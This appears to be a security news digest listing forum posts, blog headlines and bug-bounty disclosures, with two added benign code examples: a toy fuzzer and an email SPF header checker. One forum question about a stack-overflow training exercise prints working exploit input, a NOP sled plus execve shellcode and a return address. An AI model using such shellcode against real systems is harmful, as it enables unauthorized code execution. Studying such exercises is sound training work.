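    For readers who want to see what "coverage-based" means before opening the repository: the block below is an added example written for this page, not Frelatage's code, of the minimal feedback loop such a fuzzer runs. It traces line coverage of a pure-Python target with sys.settrace, keeps any mutated input that reaches a line no earlier input reached, and mutates from that growing corpus. The target function and the seed are constructed; the point of the four nested comparisons is that a blind random search has to guess all four bytes at once, while coverage feedback lets the fuzzer lock in one byte at a time.

```python
"""Minimal coverage-guided fuzzer for a pure-Python target.

Added example, not Frelatage's code.  The target below is constructed: a
chain of byte checks that ends in an exception the fuzzer should reach.
"""
import random
import sys


def target(data: bytes) -> None:
    """Constructed toy target; raising is the 'crash' we want to find."""
    if len(data) < 4:
        return
    if data[0] == ord("F"):
        if data[1] == ord("U"):
            if data[2] == ord("Z"):
                if data[3] == ord("Z"):
                    raise ValueError("reached the buggy branch")


class LineCoverage:
    """Collect the set of executed line numbers inside one function."""

    def __init__(self, fn):
        self.fn = fn
        self.code = fn.__code__
        self.lines = set()

    def _trace(self, frame, event, arg):
        if frame.f_code is not self.code:
            return None                      # do not trace other frames
        if event == "line":
            self.lines.add(frame.f_lineno)
        return self._trace

    def run(self, data):
        """Execute fn(data); return (frozenset of lines hit, exception or None)."""
        self.lines = set()
        sys.settrace(self._trace)
        try:
            self.fn(data)
            crash = None
        except Exception as exc:             # any exception counts as a crash
            crash = exc
        finally:
            sys.settrace(None)
        return frozenset(self.lines), crash


def mutate(rng, data):
    """One random byte-level mutation: overwrite, insert or delete."""
    buf = bytearray(data)
    op = rng.randrange(3)
    if op == 0 and buf:
        buf[rng.randrange(len(buf))] = rng.randrange(256)
    elif op == 1:
        buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))
    elif buf:
        del buf[rng.randrange(len(buf))]
    return bytes(buf)


def fuzz(fn, seeds, max_iters=200_000, seed=1):
    """Coverage-guided loop; returns the crashing input (or None) and stats."""
    rng = random.Random(seed)
    cov = LineCoverage(fn)
    corpus, seen = [], set()
    for s in seeds:
        lines, crash = cov.run(s)
        seen |= lines
        corpus.append(s)
        if crash:
            return {"crash": s, "iters": 0, "lines": len(seen)}
    for i in range(1, max_iters + 1):
        child = mutate(rng, rng.choice(corpus))
        lines, crash = cov.run(child)
        if crash:
            return {"crash": child, "iters": i, "lines": len(seen)}
        if lines - seen:                     # new line reached: keep the input
            seen |= lines
            corpus.append(child)
    return {"crash": None, "iters": max_iters, "lines": len(seen)}


if __name__ == "__main__":
    print(fuzz(target, [b"AAAA"]))
```

    Real fuzzers replace line sets with edge or branch counters and add a scheduler and a richer mutator, but the loop is the same: instrument, run, keep what is new, mutate what you kept.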
    Shellcode Buff Overflow Question
    As I was going through the Protostar/Phoenix stack overflows I came across something on the Stack-Five exercise that I don't quite understand on amd64. https://exploit.education/phoenix/stack-five/ Basically I can get the exploit to work when the NOP sled is 80 characters long, but when I have it 88 characters long I get a segfault. This works: t.sendline('\x90'*80 + '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + 'h'*29 + pwn.p64(0x7fffffffe5d0)) This gives a segfault: t.sendline('\x90'*88 + '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + 'h'*21 + pwn.p64(0x7fffffffe5d0)) Does anyone know why the second one doesn't work? submitted by /u/Jasonsaccount
  • Open

    Backdooring WordPress using PyShell
    submitted by /u/jonas02
    Escaping privileged containers for fun.
    submitted by /u/JordyZomer
  • Open

    Going beyond the surface: Vulns that pay well
    These days bug bounty hunters have been finding many low hanging fruits and a lot of them want to go beyond those bugs. This blog is for… Continue reading on InfoSec Write-ups »
    All About Access Control Part-1
    Hello Myself Manan Aggarwal a student from the BTech CSE is here to Present you the Blog about the All About the Access Control Part-1… Continue reading on Medium »
    A short story of IDOR for your perspective
    Hi all, I hope all is well. In this story, I’ll explain an idor bug which I found in a private bug bounty program. This story will very… Continue reading on Medium »
    SSRFire - an automated SSRF finder
    An automated SSRF finder. Just give the domain name and your server and chill! ;) It also has options to find XSS and open redirects. Continue reading on Medium »
    WhatsApp Bug Bounty: Bypassing biometric authentication using voip
    Bypassing biometric authentication just by making a call and access the app completely Continue reading on InfoSec Write-ups »
    HOF In 3 Minute Using Low Hanging Fruits
    Hello, Security Guys & Hacker In this Write Up I am Going to tell you about Continue reading on Medium »
    Response Manipulation leads to Account Takeover
    This is a short story about my recent bug hunting on a private program. This program mainly relies on OTP to check user’s authentication… Continue reading on Techiepedia »
    Weak Registration Implementation
    Let us learn some P4 bugs Continue reading on Medium »
  • Open

    SecWiki News 2022-03-06 Review
    No news updated today. For more recent articles, visit SecWiki
  • Open

    Unrecoverable and recoverable windows file
    In my forensic image, some deleted files I can recover, some I cannot. How does EnCase determine internally which files are not recoverable? For data carving, how does EnCase retrieve those files internally; does it use the same techniques as for recovering deleted files? Thanks. submitted by /u/cyberfo
    X-ways linux image analysis
    In X-Ways, if I browse the root directory of an image, I find free space, idle space and slack space; can anyone explain the difference among these three spaces? In the filter attributes, there are SUID/SGID, symlink and special file. I thought SUID files are special files; what are the special files X-Ways refers to? Does symlink mean hard link or soft link? submitted by /u/cyberfo
    Physical acquisition on unrootable phone?
    Hi all. I'm an intern in computer forensics and I'm trying to perform a physical acquisition on an Oppo phone which is unfortunately unrootable as far as I know. I have Cellebrite UFED and MOBILedit but both of them require rooted devices. Any advice for this case? Tysm submitted by /u/juneflorence
  • Open

    [Cullinan #28] Add RPO and SSJI
    This is Cullinan log #28. This time I added RPO and SSJI, and made some changes to existing entries. Add Relative Path Overwrite (RPO) Add Server-Side Javascript Injection (SSJI) Update SSRF (Add URL: Prefix) Update WebSocket Connection Smuggling (Add https payload) Now I think I have to tackle one big task I've been putting off. Next I plan to thoroughly reorganize the existing XSS posts and… update them 😅
  • Open

    Evading Network Defense with Protocol Manipulation
    Signature based intrusion detection or prevention systems, will detect malicious activity through a predefined signature. If a Red Team… Continue reading on Medium »
  • Open

    CVE-2022-25312: An XML external entity (XXE) injection vulnerability exists I
    Article URL: https://lists.apache.org/list?announce@apache.org:2022-3 Comments URL: https://news.ycombinator.com/item?id=30577267 Points: 3 # Comments: 0
  • Open

    The (Mis)Use of Artifact Categories, pt II
    My previous post on this topic presented my thoughts on how the concept of "artifact categories" were being misused. My engagement with artifact categories goes back to 2013, when Corey Harrell implemented his thoughts on categories via auto_rip. I saw, and continue to see, the value in identifying artifact categories, but as I alluded to in my previous post, it really seems that the categories are being misused. Where the artifacts should be viewed as providing an indication of the categories and requiring further analysis (including, but not limited to the population of artifact constellations), instead, the artifacts are often misinterpreted as being emphatic statements of the event or condition occurring. For example, while an entry in the ShimCache or AmCache.hve file should indicate …
    DFIR Reporting
    A request that's been pretty consistent within the industry over time has had to do with reporting. I'd see a request, some responses, someone might ask for a template, and then the exchange would die off...I assumed that it had moved to DMs or offline. Then you'd see the discussion pop up again later, in some other forum. I get it...writing is hard. I have the benefit of having had to write throughout my career, but also of putting intentional, dedicated effort into DFIR reporting, in that I had been very purposeful in seeking feedback from my boss, and incorporating that feedback into report writing. I was able to get to the point of having reports approved with minimal (if any) changes pretty quickly.  As a result, in 2014, Windows Forensic Analysis Toolkit 4/e was published, and in thi…
  • Open

    PSA: reddit appears to be removing posts/comments containing *.ru URLs
    submitted by /u/PM_ME_TO_PLAY_A_GAME

  • Open

    Big Collection of 720p Movies, solid speeds, haven't explored all the directories, so I'm marking NSFW just in case.
    submitted by /u/SatansMoisture
    Classic TV: Various video qualities, decent speeds
    submitted by /u/SatansMoisture
  • Open

    A Detailed Guide on Wfuzz
    Introduction Many tools have been developed that create an HTTP request and allow a user to modify their contents. Fuzzing works the same way. A The post A Detailed Guide on Wfuzz appeared first on Hacking Articles.
  • Open

    webOS Revisited - Even More Mistaken Identities · The Recurity Lablog
    submitted by /u/addelindh
  • Open

    Question about protecting my data while traveling .
    Traveling a lot this week and was just wondering what kind of VPN you guys use while traveling, and any other security measures you may have :) submitted by /u/Savage-shredder
    Good US based infosec recruiters?
    I never thought I would say this, normally being on the hiring side, but has anyone had a positive experience with US-based boutique infosec recruiters that they would recommend? I’ve found several listed in CISO magazine and such but don’t know if any are particularly clue-full. Public or DM is fine, thanks! submitted by /u/venerable4bede
  • Open

    Cloudflare WAF bypass via Origin IP
    Cloudflare fronts more than 16 million Internet properties and is now one of the most popular WAFs (Web Application Firewalls). A year… Continue reading on Medium »
    Bug Bounty: Open Xmlrpc.php vulnerability on WordPress site.
    what is Xml-RPC? Continue reading on Medium »
  • Open

    SecWiki News 2022-03-05 Review
    Efficiently hunting deserialization vulnerabilities: modifying GadgetInspector by ourren; JS security: AST obfuscation by ourren; Notes on developing a security gateway based on OpenResty by ourren. For more recent articles, visit SecWiki
  • Open

    How to collect a forensic image of a VSXI/ESXi host that has been infected with ransomware?
    How to collect a forensic image of a VSXI/ESXi host that has been infected with ransomware? submitted by /u/rvndomus3r2019
    Copying Hard Drive
    I am sending a hard drive I own in to Cyber Forensics. If possible, I am looking for software advice to copy the hard drive before sending it in to the experts. Additionally, if you have advice for transferring the files from the software to a type of hardware, I would appreciate it. Thanks. submitted by /u/Odd-Switch-1658
  • Open

    UK’s vulnerability to corruption uncovered amid slow sanctions response
    Article URL: https://www.theguardian.com/commentisfree/2022/mar/05/uks-vulnerability-to-corruption-uncovered-amid-slow-sanctions-response Comments URL: https://news.ycombinator.com/item?id=30566774 Points: 9 # Comments: 0
  • Open

    Plugins for Persistence (Sublime Text & VS Code)
    submitted by /u/hanbei-undying
  • Open

    unclaimed subdomain special.rkeeper.ru to takeover from tilda.cc
    Mail.ru disclosed a bug submitted by mainteemoforfun: https://hackerone.com/reports/1045644
  • Open

    FreeBuf Morning Report | Credentials of 71,000 Nvidia employees leaked; CPPCC member proposes setting up a cybersecurity and data-protection window
    Nvidia released a report acknowledging that attackers stole employee passwords and undisclosed Nvidia proprietary information from its systems.
  • Open

    Expat library: libexpat 2.4.7 (CVE fixes)
    Article URL: https://github.com/libexpat/libexpat/blob/R_2_4_7/expat/Changes Comments URL: https://news.ycombinator.com/item?id=30564782 Points: 1 # Comments: 0
  • Open

    Open-source intelligence: what can we find from photographs?
    TryHackMe: Searchlight — IMINT — Part 2 Continue reading on Medium »

  • Open

    Misinformation, Disinformation and Subterfuge, Part One:
    How I triggered a weaponized Fake-Left Troll Farm meant to harass, target, defame and deplatform prominent Disinformation researchers. Continue reading on Medium »
    Maltego Basics: Building a Network Diagram
    This post is a step-by-step guide to create a network diagram in Maltego. Continue reading on Medium »
    The OSINT Toolkit!
    Baidu Maps http://map.baidu.com/ Continue reading on System Weakness »
    OSINT: digital "influencer" arrested after being identified doing dance videos
    Imagine doing your trending little dance on TikoTeko and getting arrested right after? Well, that is what happened. Continue reading on Medium »
  • Open

    The perils of the “real” client IP [or the many ways to use X-Forwarded-For for incorrectly]
    submitted by /u/yesyoucantrip
    A Backdoor Lockpick : Reversing Phicomm’s Backdoor Protocols
    submitted by /u/stargravy
    Hacking Hadoukens: Reverse Engineering a Street Fighter Two Cabinet
    submitted by /u/wrongbaud
    ICS & OT Risk and Vulnerability Report
    submitted by /u/h4ck3dit
    Finding an Authorization Bypass on my Own Website - SQL Injection in a Parameterized Query
    submitted by /u/mdulin2
    New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?
    submitted by /u/YuvalAvra
  • Open

    Normal User is able to EXPORT Feature Usage Statistics
    Lark Technologies disclosed a bug submitted by aishkendle: https://hackerone.com/reports/1470076 - Bounty: $500
    Brute force attack of current password on login page by bypassing account limit using IP rotator(https://dashboard.omise.co/signin)
    Omise disclosed a bug submitted by sachinrajput: https://hackerone.com/reports/1466967
  • Open

    Fuzzing unsafe code in a Rust crate
    Nearly all Rust code is memory-safe. A necessary part of using Rust is to use the wide ecosystem of third-party Rust crates. These are… Continue reading on Medium »
  • Open

    Does bluetooth create a vulnerability for the broadcasting device itself?
    I see how Bluetooth is a vulnerability to the data that's being transferred over the connection, but does it pose an actual threat to, let's say, a phone's internal data? Or are they just going to be able to listen along to my music? submitted by /u/zeff_05
    Airbnb Donations
    Does Airbnb have a robust enough infosec team to prevent Russian hackers from registering fake properties in Ukraine to take advantage of all the people in America lazy enough to only donate to Ukrainians through reserving Airbnbs? submitted by /u/intentropy
    Why would an inbound email from a 3rd party have an IP internal to our org in the SPF record?
    I'm looking at an email that was suspected as a phish and for the most part it's fairly benign but there's a few areas in the headers that don't add up for me. The call to action in the email was to update some Site-to-Site VPN addresses to US Bank. Important to note that we don't currently have anything like that established with them, though the support numbers appear to be official and I just don't clearly see where the hook here is yet. The part that confuses me most is that the sender IP listed as the first SPF record is our public NAT address for client VPNs and not even one of our mail servers. The headers do refer to one of our mail servers further down, however it's the wrong IP. I'm new to the org though so may not have all the pieces to the puzzle. Are there simple explanations…
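    One way to make the kind of header discrepancy described above visible mechanically, added here as an example and not part of the post: parse the Received chain and the Received-SPF result from the raw message, then check where the SPF-evaluated client-ip sits relative to the org's own address ranges and to the nearest external hop. The message, the ranges 192.0.2.0/24 and 203.0.113.0/24 and the mail-server list are constructed for illustration; the check reports the mismatch, it does not explain it.

```python
"""Cross-check Received-SPF against the Received chain and the org's own ranges.

Added example, not from the original post.  The message, the org ranges and
the mail-server list are constructed; change them to your own values.
"""
import ipaddress
import re
from email import message_from_string

# Constructed message: newest Received header first, as delivered.  The SPF
# result names a client-ip inside the org's public range, yet the host that
# handed the message to the org's MX is an external relay.
RAW = """\
Received: from mx1.corp.example (mx1.corp.example [192.0.2.25])
\tby mail.corp.example with ESMTPS; Fri, 4 Mar 2022 10:02:11 -0500
Received: from relay.vendor-mail.example (relay.vendor-mail.example [198.51.100.77])
\tby mx1.corp.example with ESMTPS; Fri, 4 Mar 2022 10:02:09 -0500
Received-SPF: pass (corp.example: domain of notices@usbank-updates.example designates 203.0.113.40 as permitted sender) client-ip=203.0.113.40;
Authentication-Results: mx1.corp.example; spf=pass smtp.mailfrom=usbank-updates.example
From: "US Bank Support" <notices@usbank-updates.example>
To: netops@corp.example
Subject: Action required: update site-to-site VPN endpoints

Please update your VPN peer addresses ...
"""

ORG_RANGES = ["192.0.2.0/24", "203.0.113.0/24"]   # assumed: internal MX block, public NAT block
MAIL_SERVERS = ["192.0.2.25"]                      # assumed: the org's actual MX

IPV4_IN_BRACKETS = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def received_chain(msg):
    """Bracketed IPs from Received headers, newest hop first (header order)."""
    chain = []
    for hdr in msg.get_all("Received", []):
        m = IPV4_IN_BRACKETS.search(hdr)
        if m:
            chain.append(m.group(1))
    return chain


def spf_client_ip(msg):
    """The client-ip the receiving MX evaluated SPF against, if recorded."""
    m = re.search(r"client-ip=([0-9.]+)", msg.get("Received-SPF", ""))
    return m.group(1) if m else None


def in_ranges(ip, nets):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def check(raw, org_ranges, mail_servers):
    """Return the chain, the SPF client-ip and a list of discrepancy findings."""
    msg = message_from_string(raw)
    nets = [ipaddress.ip_network(r) for r in org_ranges]
    chain = received_chain(msg)
    spf_ip = spf_client_ip(msg)
    # The hop that should have been SPF-checked is the nearest one that is
    # not ours: the first external address walking from the newest header.
    external = [ip for ip in chain if not in_ranges(ip, nets)]
    findings = []
    if spf_ip:
        if spf_ip not in chain:
            findings.append("spf-client-ip-absent-from-received-chain")
        if in_ranges(spf_ip, nets):
            findings.append("spf-client-ip-inside-org-ranges")
            if spf_ip not in mail_servers:
                findings.append("spf-client-ip-is-not-a-known-mail-server")
        if external and external[0] != spf_ip:
            findings.append("spf-evaluated-on-different-host-than-first-external-hop")
    return {"chain": chain, "spf_ip": spf_ip,
            "external_hop": external[0] if external else None,
            "findings": findings}


if __name__ == "__main__":
    for key, value in check(RAW, ORG_RANGES, MAIL_SERVERS).items():
        print(f"{key}: {value}")
```

    When the SPF client-ip is one of your own addresses and is not in the Received chain at all, the next thing to establish is which host wrote that Received-SPF header and what it saw as the connecting client; the script only points at the line to pull.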
    Utilization - Does Your Organization Care? Do Your Employees Like it in InfoSec?
    Hey everyone. Moderating this subreddit throughout the past 6 or so months, I have seen the topic of utilization come up quite a bit. While metrics need to be gathered to determine whether an employee does their job or not, having baselines often causes stress, unrealistic expectations, and caveats that cause issues with this requirement (i.e. training on common security topics/trends/new threat landscapes). As far as I know, having a growth mindset and focusing on metrics related to security inside the organization is the way to go, and not micromanaging employees on the numbers each one of them pushes out. I'd be interested to hear others' thoughts on this, and how it relates to your employees and organization. submitted by /u/Envyforme
    Dealing with impostor syndrome?
    Leaving it kinda brief: I have around 6 years in security, starting off as a QA and deployment engineer, and later moving on to partners and doing what I consider architecture. Most of my background is focused on SIEM: scoping out deployments, talking to clients about what to log and understanding their requirements, and how to change/modify their environments to match our service offerings, etc. Anyway, I took a "Security Architect" role at a big 5 firm and definitely realized I'm under-prepared. What can I do to make sure I don't get fired? I didn't entirely oversell myself and I was totally open about my experience; I just feel way overwhelmed with the level everyone else in my group is at. submitted by /u/Kirin-Jack
    Should I learn gdb or GNU debugger? If yes, then why?
    Idk what to write submitted by /u/The_Intellectualist
    Software Developer Administrative Rights
    What is everyone else doing to effectively control (remove) the use of administrative rights on the workstations development team members use? We pulled local admin rights from general employees years ago without much issue, but every time we approach our dev teams to do it, it's just impossible, as it extremely inhibits their work: they legitimately need to do config management for locally installed services (e.g. IIS) and, maybe less legitimately, install "development tools". I'd add, we do have prod, QA, dev and sandbox environments, but the devs still choose to do development on their desktop systems for "performance" reasons, which there is some truth to as we give them beefy hardware (tons of RAM/top-end CPUs). Edit: after some good dialog here, it seems the common perspective is to put them in an isolated environment such as a VM. Thanks everyone for the discussion. Still monitoring this, so chime in with any other thoughts/experience. submitted by /u/clayjk
    Nvidia Breach
    It looks like there are two certificates now compromised as a result of the Nvidia breach. What, if anything, should organisations be doing to protect themselves? submitted by /u/annonuk2020
  • Open

    CVE-2021-4128: PfSense 2.5.2 Shell Upload
    Article URL: https://packetstormsecurity.com/files/166208/pfSense-2.5.2-Shell-Upload.html Comments URL: https://news.ycombinator.com/item?id=30557143 Points: 10 # Comments: 0
  • Open

    Exposing the Trickbot Malware Gang - An OSINT Analysis
    Based on a yet another recently leaked batch of internal Trickbot malware gang's communication channels I've decided to come up with a proper OSINT analysis on the topic and actually enrich and actually enrich the original information data set including to elaborate more and provide actionable intelligence on the online whereabouts of the Trickbot malware gang's Internet-connected
  • Open

    SecWiki News 2022-03-04 Review
    Mnemosyne: an efficient watering-hole attack investigation and forensics system by ourren; GoDLP: a sensitive-information protection system by ourren; Make JDBC Attacks Brilliant Again, extra edition by ourren; Attack Flow — Beyond Atomic Behaviors by ourren. For more recent articles, visit SecWiki
  • Open

    New Linux vulnerability affecting cgroups: can containers escape?
    Article URL: https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/ Comments URL: https://news.ycombinator.com/item?id=30556188 Points: 91 # Comments: 58
  • Open

    Data URI(data:) XSS v2
    A long time ago I wrote a post covering Data URI XSS, "An XSS filtering bypass technique using form action + data:"; today I want to write a slightly improved version. This is Data URI XSS v2. The PortSwigger XSS cheat sheet, and most other cheat sheets, do not cover data: well. For XSS via the embed tag, only javascript:alert() is listed. Is that really all there is? Of course not 🤩 1. Data URI: to build more Data URI bypass patterns, we first need to learn a bit more about Data URIs, right?
  • Open

    steps to run before analyzing the iphone image
    Steps to run before forensic analysis: turn off screen lock, turn off backup, turn off Find My iPhone; what else? submitted by /u/cyberfo
    Career Advice
    I've been working in eDiscovery and forensics for about three years, mostly lit support and low-level investigations. I hold CFCE and CCE certs. I'm currently enrolled at Champlain and I'll be wrapping up my B.S. in Computer Forensics and Digital Investigations. I'm located in an HCOL area and thinking of transitioning to a different company due to pay disparity. IR is in greater demand, so I imagine I'll be able to leverage more money in that field. What steps (training, certs, etc.) should I take to prepare myself if I decide to change my focus to DFIR? submitted by /u/stickyricky714
    Trying to MFTExplorer but it returns an error. Any way to circumvent this?
    submitted by /u/KTthemajicgoat
    Interesting
    submitted by /u/kramps_
  • Open

    PORTSWIGGER WEB SECURITY - WEBSOCKETS LAB SOLUTIONS
    WebSocket is a bidirectional protocol that transfers data between client and server and, like HTTP, is widely used in modern web applications… Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - CLICKJACKING LAB SOLUTIONS
    Clickjacking is an attack in which the target user is made to click a malicious link hosted by the attacker in a web application, as a result of which various… Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - CORS (CROSS-ORIGIN RESOURCE SHARING) LAB SOLUTIONS
    CORS (Cross-Origin Resource Sharing) is a mechanism that provides controlled access to resources outside a given domain… Continue reading on Medium »
    Gold Bug Bounty Resources | Web Application, Android & iOS Security
    Take your time and start learning from these Resources. Continue reading on Medium »
    The Secret trick for subdomain Enumeration
    Probably the most covered topic in bug bounty hunting and web apps is subdomain enumeration. Continue reading on Medium »
    Bug Bounty Toolkit
    Bug bounty platforms and programs Continue reading on System Weakness »
  • Open

    [Day 9] Networking Where Is All This Data Going | Advent of Cyber 3 (2021)
    No content preview
    HTML Injection via user agent leads to website distortion revealing backend code.
    No content preview
  • Open

    FreeBuf Weekly | Up to 1TB of NVIDIA data stolen; Toyota halts production after a supplier suffers a cyberattack
    A summary of this week's hot news, quality articles and handy tools, so that nobody misses any of this week's key points!
    Avast releases a free decryptor for HermeticRansom, which attacked Ukraine
    Avast recently released a free decryption tool for the HermeticRansom ransomware, solely to help Ukrainian victims facing extortion recover their data.
    Notes on a simple penetration test
    A summary of a simple penetration test
    The Cyberspace Administration of China releases the "Regulations on the Administration of Internet Pop-up Information Push Services (Draft for Comment)"
    The Regulations state explicitly that providers of operating systems, terminal devices, application software, websites and other services within China must comply with the Regulations when offering internet pop-up information push services.

  • Open

    Computer workstation question
    Hello everyone, I know this has been asked before however I’m going to build a forensics workstation for my department; we don’t have a lot of money to throw around to do a dual CPU set up. I was wondering if anyone would recommend the newest i9-12900K CPU for processing, or any other processor for the most efficient in imaging. I mainly use Magnet Axiom and Cellebrite. One thing I’m having trouble with is finding a good MOBO, what would you all recommend, I need enough ports for a write blocker and multiple HDDs, and M.2 SSDs. Thanks submitted by /u/ExiisTT [link] [comments]
    Microsoft Surface Go 2 - Bitlocked and Paladin
    Good day, all! I am working with a MS Surface Go 2. I have/had the PIN to access the device. I did obtain a memory capture and logical image of the C: drive using FTKi. After obtaining that data, I tried to boot into Paladin but it would not load/boot. I went into the UEFI and disabled the Secure Boot option, knowing this may cause the device to become bitlocked - which it did, but did allow Paladin to boot. As I do 99% phones, this one is throwing me for a loop and I am seeking some guidance. I am now able to image the drive using Paladin, but obviously it will be bitlocked. The recovery key "should" be captured in the RAM, right? And if so, how do I decrypt the data once loaded (or before)? I would be using Axiom to load the data. Thanks in advance for any insights and help! submitted by /u/Responsible_Dig_2899 [link] [comments]
    Executed files
    Hi, how can I investigate an executed malicious file like a maldoc or any executable? How do I get the list of artifacts? Thanks submitted by /u/0X900 [link] [comments]
    Cellebrite UFED file system extraction
    Does Cellebrite support file system extraction for deleted files? If yes, do we need to root the iPhone or Android phone for data extraction? submitted by /u/cyberfo [link] [comments]
    The Truth About USB Device Serial Numbers (and the lies your tools tell) - Computer Evidence Recovery
    Quote from article: What we have then discovered, is that in most cases, external portable devices are not properly reported in Windows, at least insofar as what regards a Serial Number. This becomes incredibly problematic when your forensic reports says that the device serial number is “ABCD”, and an opposing expert says it is “EFGH”. Who is right? It is tough to convince a court that your tool is right and the label from the manufacturer is wrong. Are you examining a plastic container? Or are you examining a hard drive? What you do matters. Lives are affected by the work of digital forensics practitioners. https://www.computerpi.com/the-truth-about-usb-device-serial-numbers-and-the-lies-your-tools-tell/ submitted by /u/Erminger [link] [comments]
    detect data exfiltration to USB
    How to detect data exfiltration to external USB drive through $MFT, thanks submitted by /u/cyberfo [link] [comments]
  • Open

    Analysing 3177 organisations to track the 10 most popular email spam and malware filters
    submitted by /u/Jumpy_Resolution3089 [link] [comments]
    SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store
    submitted by /u/Goovscoov [link] [comments]
    A Closer Look at the Russian Actors Targeting Organizations in Ukraine
    submitted by /u/CyberMasterV [link] [comments]
    Bypassing Google's Cloud Armor firewall with an 8 KB request
    submitted by /u/almostfamous [link] [comments]
  • Open

    OSINT: Corporate Recon — HTB Academy Walkthrough
    INTRODUCTION: Continue reading on Medium »
    OSINT challenge
    Tryhackme: Searchlight — IMINT Continue reading on Medium »
    Shodan Dorks — Hunting CVEs, Photos and Gas Station Tank Controllers.
    Any cybersecurity enthusiast knows the Shodan search engine, but would you know how to use the right parameters to "dork"… Continue reading on Medium »
    A cybersecurity and cyber-intelligence enthusiast with many things to tell you.
    Are u re4dy? Continue reading on Medium »
    OSINT ON GMAIL ACCOUNTS
    Google Hunt Tool Continue reading on System Weakness »
    Metagoofil
    (LET’S EXPLORE HIDDEN FILES) Continue reading on Medium »
  • Open

    Hacken's Role in Ukraine's Cyber Defense: The Latest AMA with Dyma Budorin
    The Hacken team recently held its first AMA session with our CEO Dyma Budorin since the start of Russia's invasion of Ukraine… Continue reading on Medium »
    Host Header Injection Leads To Pre-Account Takeover Worth 100$
    Self Introduction : Continue reading on Medium »
    Weakly Typed SQL Injection
    Programming languages come in two categories: Hard/Strong Typed Soft/Weak Typed Continue reading on Techiepedia »
    A Clickjacking - Which Rewarded me with 275$
    Vulnerability Category: A6- Security Misconfiguration Continue reading on Medium »
    Found API Token on js file
    Continue reading on Medium »
  • Open

    Uber Test Report 20220301
    Uber disclosed a bug submitted by johnzilla313: https://hackerone.com/reports/1496297
    Subdomain Takeover at https://new.rubyonrails.org/
    Ruby on Rails disclosed a bug submitted by nagli: https://hackerone.com/reports/1429148
    stand.pw.mail.ru xss
    Mail.ru disclosed a bug submitted by smallyu: https://hackerone.com/reports/1400197
  • Open

    (1st post) Atari FTP Archive : Atari/8bit/demoscene related material since 2002. 845GB in 938689 files
    submitted by /u/Pablouchka [link] [comments]
    Bald Actors
    https://www.baldactors.com/wp-content/uploads/2016/03/ submitted by /u/SnooObjections8515 [link] [comments]
    Was searching funnies...
    Seems like my post has been deleted again... Why not just take out the links that offend... Personal info is not personal if it is on the web... So Here is some funny... http://www.p14nd4.com/ars/ Starts here... http://www.thedevilsdue.us http://www.thedevilsdue.us/!.Music/AllMusic/!.DW.80GB/My%20Music/ music http://alliza.iptime.org/mobile/%c8%a8%c6%fa%b4%f5/%c1%c1%c0%ba%c0%da%b7%e1%bd%c7/%c0%bd%be%c7%c0%da%b7%e1%bd%c7/ http://iama.stupid.cow.org/Audio/ https://video.donaldandcheryl.net/Funny/ https://simpsons.porn/assets/images/ http://edmazur.com/images/funny/ http://fricking.ninja/Media/photo_comments/mp4/ http://www.kyudan.com/funny/Corel%20Auto-Preserve/ http://www.kyudan.com/funny/img/ images... https://alt-tab.org/data/images/ submitted by /u/xanderTgreat [link] [comments]
    Printable Origami Paper Directory
    https://www.origamiway.com/printable-origami-paper/ submitted by /u/shaburushaburu [link] [comments]
  • Open

    Chrome 100 Beta: Reduced User-Agent Strings, Multi-Screen Window Placement, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 100 is beta as of March 3, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Last Version for Unreduced User-Agent String Chromium 100 will be the last version to support an unreduced User-Agent string by default (as well as the related navigator.userAgent, navigator.appVersion, and navigator.platform DOM APIs). The origin trial that allowed sites to test the fully reduced User-Agent will end on April 19, 2022. After that date, the User-Agent String will be gradually reduced. To review …
  • Open

    [Security Advisory] Spring Cloud Gateway Remote Code Execution Vulnerability Risk Noti...
    Spring recently published a CVE report for Spring Cloud Gateway, which includes a Spring Cloud Gateway remote code execution vulnerability (CVE-2022-22947). An attacker can exploit this vulnerability to maliciously create and allow...
  • Open

    A Case Study: Defending against ransomware with Microsoft Defender for Endpoint and Intel TDT
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?
    CVE-2022-0492 is the third recent kernel vulnerability that allows malicious containers to escape. We offer root cause analysis and mitigations. The post New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape? appeared first on Unit42.
  • Open

    My computer keeps saying "network certificate not valid" or something like that, whenever I go to reddit, download libraries with gradle, basically anything at all. Am I under attack?
    SWE, but no idea why I keep getting a red message in Chrome when I try to go to websites I normally go to submitted by /u/oaxac9 [link] [comments]
    How can one protect oneself in case some devices of one's family get infected?
    One of my family has been complaining about her phone being always laggy. Which shouldn't happen because she uses a relatively new device? Well, there is also a possibility that she doesn't kill background processes. But lately, I have been noticing the network becomes really laggy (supposedly it's not because of Ukraine?), and sometimes it just completely shuts down/disconnects. Since we share the same wifi, are there any things I can do? Something to suggest to her, or for me to avoid getting infected, just in case. Thank you in advance! edit: I'm not sure if I should also include this but. I have a windows tablet and a Linux desktop that connects to the router through ethernet all the time. To be honest, I am not even sure if it can affect me in any way, since I'm not educated at all in cybersecurity. Hopefully I'm just paranoid? Just to be sure haha, sorry for random posting. submitted by /u/manho1e [link] [comments]
    Where can I check if a website downloaded a force file?
